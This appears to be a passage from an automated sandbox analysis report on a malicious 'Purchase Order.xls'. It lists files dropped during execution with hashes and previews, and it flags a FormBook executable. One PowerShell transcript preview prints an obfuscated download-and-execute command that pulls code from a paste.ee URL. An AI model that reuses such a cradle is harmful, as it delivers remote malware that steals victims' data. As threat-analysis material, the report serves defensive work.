                                                                                                                                                  SHA1:27F5FC6D60F05E204BB94F3C8A3622DD5128E1BA
                                                                                                                                                  SHA-256:4414803F84890A92B182812157BC83D09D96E35786894DF3D1CE38B94C09DFCD
                                                                                                                                                  SHA-512:69E6CFDAD3B2B218E3AEE333124B270AF8F03DE51DAC1CA1E7D3CA08A07D8003C12FBDF6EE0458335B900BFD7C07B0BC8055120E7B3BFA38D0777363D3A3E098
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-03-22T11:38:47">.. Build: 16.0.13916.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5829
                                                                                                                                                  Entropy (8bit):4.8968676994158
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                                                                                  MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                                                                                  SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                                                                                  SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                                                                                  SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17700
                                                                                                                                                  Entropy (8bit):5.583252636577693
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:ZtpLUdWDsdvsP5C9v/6SBKn977ilrIbsIvWCkY1uPrFYTJ:udvs5ia4Kt7ilrN5GF
                                                                                                                                                  MD5:B48AFAD6E9F976EE17640415C0A2F525
                                                                                                                                                  SHA1:DC5EAB8807AA6EFF40F25B71C4932C95F31FD89D
                                                                                                                                                  SHA-256:B92B539F52E6E5865D616848B9F4F14627F8B9E0623347857827DCC51A087C0B
                                                                                                                                                  SHA-512:B0D5808D61C67BE5B3303D0CF50B6883D38C94845CF63E41B03AFECF142931FDB7A2D3C0299575A668B08F6469969990E09EDB2368ABD792FAA05A90B726B7BC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: @...e...........................$.....1.3............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\7A810000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):46841
                                                                                                                                                  Entropy (8bit):7.548220238124915
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:r38QTdE68eU6sm7eJ3yHn4nyBliB4SpxiPbO+Gi31c:bTTy68etZiJ3G4oiS1bO+53q
                                                                                                                                                  MD5:A57B580BE640D859FEF81B9F732A86C3
                                                                                                                                                  SHA1:FECE7DBD21F1115CA5B58E07443BD15A11F07B78
                                                                                                                                                  SHA-256:BC35FCDE963F3D2832C07B5576B53031D22E7F53BDEDCA1FC4FC10D088AD6220
                                                                                                                                                  SHA-512:36AFAC5E44E75B354F9342E0BD4A034D1BBDDF315129DE888E021E5355D7D997B0D497508F3FEEA3E9E6D013BE8A8D3CC6693A76AF5421392EA5B16752226582
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .U.n.0....?......(..r.Mrl.$...\K...w.....m.G...E..;3;K...+...hch.Y3......]+~.]._E...Q..h..P\.>~...`...[...oR...+lb..3..."..LJ/U..|2."u...j*.b6....wT].xx.dn...o...V....X.|...I.....D}.....A....&e....81.r/g..3N..2.?"..q2.>4.9...M...:.Pf.........@u.2.P..+'.c^.c\6.A...kXip..X...*....S6<)<.4..BQ...1...O.......o...H../..=t|.O:..=.......b.9Q....|.l7...{....7......}B...H......:....&...3.w.....:1.d...~.z........z1`.p..:.........PK..........!.L!.e............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjr4e1pf.b2g.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtanv0bb.5vq.ps1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsg4eajm.m0s.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhcqjqvo.ipe.ps1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\qMBRkI.exe
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):164864
                                                                                                                                                  Entropy (8bit):7.208990214073085
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:QBSz6jTSKHQAJoYSW5cPDSpNpcOMN9Q8LYO4y3n6+OC5qssK:J5XYoYR5EupNWOMN9Q8eyX6iLsK
                                                                                                                                                  MD5:93259FD8317C8518EBE331A3FAE2F45A
                                                                                                                                                  SHA1:EDDE3515992978A4B5E6BAA63B77E605E6A96D94
                                                                                                                                                  SHA-256:0FC53546D5BBB5D134E1EE3E7F8AD81F58B00F31A9DA9F8B2FF82EA2931137F5
                                                                                                                                                  SHA-512:696AC92152CFDC2D85CE14692F4C79C0D00A3F384240F16DE1DFB0503AA527C81EBD00A129C1B86C3EEE8FB989E9B7E27423B9260C2B4106504625A5F876151D
                                                                                                                                                  Malicious:true
                                                                                                                                                  Yara Hits:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview: MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$.............E...E...E.OE...E.zE...E.yE...ERich...E........PE..L...<5.D.................r..........p.............@.......................................@..........................................................................................................................................................text... p.......r.................. ..`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Mon Mar 22 18:38:49 2021, atime=Mon Mar 22 18:38:49 2021, length=8192, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):904
                                                                                                                                                  Entropy (8bit):4.6605616640007135
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8kyNcXUguElPCH2Ap9M1YbI8+WrjAZ/2bDtTLC5Lu4t2Y+xIBjKZm:8NNNp9meAZiDQ87aB6m
                                                                                                                                                  MD5:5879F595263DF4C30812664C17111E00
                                                                                                                                                  SHA1:36BBE1CB8C3E9E7E5B740166852CDBFE230501FA
                                                                                                                                                  SHA-256:3A03A4D75828AE57B990179E09FF6C067B2CA588735EC0AF7B7A6802BA58DD8A
                                                                                                                                                  SHA-512:CC14CA9EF1A85D9F1469454FD62E352F60E0E848851FE6CE7A2C082AA007A6CD9888CDD3B7855EAD23E5D2318A7ED9594FF59D940B7A88942802553F247949FC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: L..................F........N....-..h.u.R.....].R.... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..vR.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.vR......S....................U...h.a.r.d.z.....~.1.....vR...Desktop.h.......Ny.vR......Y..............>......kg.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......715575...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase Order.xls.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Mon Mar 22 18:38:49 2021, atime=Mon Mar 22 18:38:49 2021, length=75776, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2150
                                                                                                                                                  Entropy (8bit):4.679296885879289
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8Mdp92feAACYHxuDVOV+7aB6myMdp92feAACYHxuDVOV+7aB6m:8Md2cCCWOV3B6pMd2cCCWOV3B6
                                                                                                                                                  MD5:C14225BADAF8646AC5D2A969C74B3A07
                                                                                                                                                  SHA1:41FD25564E62D341C8339996F6414168AB860EBC
                                                                                                                                                  SHA-256:101C588BE39F38D878C9EF627951074744975FA01391F0A78D2E3EE7EADACBF9
                                                                                                                                                  SHA-512:91A88A4AA5A8FFB0211A999EBC0D3E5CAA17846D899211214C8AA42C801E50E8A9253C60250EB1CF9FBBDF71EBE661D90684D0D589C5EF59B1418804C9F3048F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: L..................F.... ...|...:...jX[.R...jX[.R....(...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..vR.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.vR......S....................U...h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny.vR......Y..............>.....v...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2.....vR. .PURCHA~1.XLS..V......>QvxvR.....h......................A..P.u.r.c.h.a.s.e. .O.r.d.e.r...x.l.s.......X...............-.......W...........>.S......C:\Users\user\Desktop\Purchase Order.xls..).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.u.r.c.h.a.s.e. .O.r.d.e.r...x.l.s.........:..,.LB.)...As...`.......X.......715575...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):140
                                                                                                                                                  Entropy (8bit):4.54386375745506
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:z/N4qao25iyBVomM/N4qao2t34qao2mM/N4qao2v:zKXiyj6KDo1KB
                                                                                                                                                  MD5:33E5FECC279E667D3EF48C2AF79FDD6A
                                                                                                                                                  SHA1:B14036FA730663B38BC81E2F19DD06E085DED556
                                                                                                                                                  SHA-256:46488B165D8B1B789B8E38DB73EA0067BDADA03BD5D59A544A01EC3FBCC2546A
                                                                                                                                                  SHA-512:E89970A2500A643BA65E2D10009869AFCBA8B94E9CDE61884B1BA28DA8A89933DD91AB1C35E70860E3CCFD190C55146F0741B0386F92A78FE6A9180D69895543
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: [xls]..Purchase Order.xls.LNK=0..Desktop.LNK=0..[xls]..Purchase Order.xls.LNK=0..Purchase Order.xls.LNK=0..[xls]..Purchase Order.xls.LNK=0..
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E785DCRCHBPDMK9A2RD2.temp
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6205
                                                                                                                                                  Entropy (8bit):3.752124415748502
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:Iniq9C//51XkvhkvCCt9PM++HOAhxAtM++HOAhxA0:NqKP7FMgAjAtMgAjA0
                                                                                                                                                  MD5:D5426ADA0FE21AE1E50CB4B0F543D480
                                                                                                                                                  SHA1:03CB87C0EF381276DE975100BE1D106E9CE57AAB
                                                                                                                                                  SHA-256:157920499704CCB84FB3E8E80E5CE004093FD4C5F0036FFA38E1184BEDC7A642
                                                                                                                                                  SHA-512:9D7CE4A280E7A33BC13969F30F0E28AE7F901758A25FC8FF93039F62A32EC08A6E1189CCABB87834F1CBC8E4D637BBE763A963CB0926648EEE5FCD1B1A602A78
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-......:...z;!.R.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny.vR......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny.vR......Y....................D1,.R.o.a.m.i.n.g.....\.1.....>QCw..MICROS~1..D.......Ny.vR......Y........................M.i.c.r.o.s.o.f.t.....V.1.....>Qwx..Windows.@.......Ny.vR......Y....................U...W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny.>Q\x.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny.>Q\x.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.>Q.v.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                                                                                                                                                  C:\Users\user\Desktop\9B810000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):84337
                                                                                                                                                  Entropy (8bit):6.17039140132302
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:wk3hOdsylKlgryzc4bNhZFGzE+cL2knACTTy6RetZiJ3i4ciS12+k3hOdsylKlgR:wk3hOdsylKlgryzc4bNhZFGzE+cL2kn8
                                                                                                                                                  MD5:F701DB0B610AAA96A4D393974CD0DBD1
                                                                                                                                                  SHA1:504F1DD5470D0E129DEFDCFC60F1094EB625452C
                                                                                                                                                  SHA-256:8C43ABCEE04BEA27F245A0E0BC939F7AF3091DEA72439A2CD6CA518132A6EB97
                                                                                                                                                  SHA-512:CF4FD8672780493C3B38282229C4C7B13334D182D72563D46E00DE475B66A886D4A208DE48F0F810D3EEFA8228C4FA60041AAD1587CD91A78AE7FD2384ADD72C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=........Z8"8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.
                                                                                                                                                  C:\Users\user\Desktop\BD520000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):84337
                                                                                                                                                  Entropy (8bit):6.170439791112184
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:wk3hOdsylKlgryzc4bNhZFGzE+cL2knAfTTy6RetZiJ3i4ciS12Mek3hOdsylKlr:wk3hOdsylKlgryzc4bNhZFGzE+cL2knd
                                                                                                                                                  MD5:B2E4EFF9D3C027BFD2AA2760B5F67657
                                                                                                                                                  SHA1:147B409EEAAD18AB6DD4D696A5C36280F0960A0B
                                                                                                                                                  SHA-256:AFF0B05CCD6E75EA0E3C1EB0049D72AE8C0542E9125239EDAA6A822574CAE939
                                                                                                                                                  SHA-512:A81417B2BA7CF00C6579E5D8EBBF778870276D8E2DEE003FBC088B3160B36437220EB5DAAF1D0C9ACC895C4D9F1F822C328100A8BF908B8660721783F26A692F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=........Z8"8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.
                                                                                                                                                  C:\Users\user\Documents\20210322\PowerShell_transcript.715575.436WDyok.20210322123852.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1031
                                                                                                                                                  Entropy (8bit):5.221154649771874
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSAkyxvBnRwZx2DOXhfT9Z0W5HjeTKKjX4CIym1ZJXGfT9ZwWnxSAZiS:BZZvhqZoOF35qDYB1Z2o4ZZiS
                                                                                                                                                  MD5:DC6735284494A48FD12762E46B711A47
                                                                                                                                                  SHA1:D9FF93BB42E6E5010ACEB923C2BD833EEE18B175
                                                                                                                                                  SHA-256:4C308D9F5CAA1D96F8F390DB7C11187BAA8C55416F77A17330DE0F74C9D66025
                                                                                                                                                  SHA-512:3AF977A08AE9DF0442A5D637301F7EEDA2150007937A517C20C5DDBCDD6B812FD1FD5C0DD5E3F8AF0B3F437E5F89C7E09F750E98D91E3EEF608B6376DDDFF72A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210322123904..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')..Process ID: 4544..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210322123904..**********************..PS>IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')..**********************..Command start time: 20210322124340..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 202103221
                                                                                                                                                  C:\Users\user\Documents\20210322\PowerShell_transcript.715575.x61eIDWo.20210322123919.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):35635
                                                                                                                                                  Entropy (8bit):5.141922916160296
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:oFNmpG8wq0k7eXUYVPD7bqYMC4PkD/KzOaEui1m9UJxUIX261C:ouLB0kbyPD3qBPkDQElJAehY
                                                                                                                                                  MD5:5C3CDE92D7BA83C594ACECF60710DB46
                                                                                                                                                  SHA1:8FC32D34B0139FBC6981D0F3179BAD8C3596F2F0
                                                                                                                                                  SHA-256:0F3845E2D50F3F55BF465ADED6B1C7A6D76BC17BEDEC018269283F317CBB28E4
                                                                                                                                                  SHA-512:E6E26EF03AA198A4296EC1978084F521EE529015F1448DE2B17B35F62AEC5DAD1FFA2A808C5921C5238BD80B926C9B9147CC0D13CE5A16CC86DD7F23B5FF4718
                                                                                                                                                  Malicious:false
